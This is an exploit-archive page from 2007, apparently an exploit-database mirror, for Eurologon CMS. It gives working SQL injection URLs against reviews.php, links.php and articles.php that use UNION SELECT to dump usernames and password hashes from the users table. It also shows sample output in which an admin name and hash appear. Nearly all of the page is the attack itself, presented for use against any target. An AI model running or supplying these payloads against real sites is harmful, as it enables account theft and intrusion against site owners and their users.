[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Eurologon CMS Multiple Remote SQL Injection Vulnerabilities
# Published : 2007-11-27
# Author : KiNgOfThEwOrLd
# Previous Title : NoAh <= 0.9 pre 1.2 (filepath) Remote File Disclosure Vulnerabilities
# Next Title : Eurologon CMS files.php Arbitrary File Download Vulnerability
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |_______ _____/ |_ /_ |/ |_
| |/ | | _(__ <_/ ___ __ ______ | __
| | | | |/ ___| | /_____/ | || |
|___|___| /__| /______ /___ >__| |___||__|
/______| / /
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Eurologon CMS reviews.php/links.php/articles.php SQL Injection
---------------------------------------------------------------
#By KiNgOfThEwOrLd
---------------------------------------------------------------
PoC
Useless..
---------------------------------------------------------------
Exploit
http://[target]/reviews.php?id='+union+select+1,concat(username,0x3a,password)
+from+users/*
http://[target]/links.php?id='+union+select+1,concat(username,0x3a,password)
+from+users/*
http://[target]/articles.php?id='+union+select+1,concat(username,0x3a,password)
+from+users/*
---------------------------------------------------------------
Result
You will see the disclosed informations under some mysql errors like:
Can't execute query
[QUERY]
MySQL Error: The used SELECT statements have a different number of columns
Can't execute query
[QUERY]
MySQL Error: The used SELECT statements have a different number of columns
Can't execute query
[QUERY]
MySQL Error: The used SELECT statements have a different number of columns
Home > [category_name] > [category_name] > [admin_name]:[admin_hash]
---------------------------------------------------------------
# www.Syue.com [2007-11-27]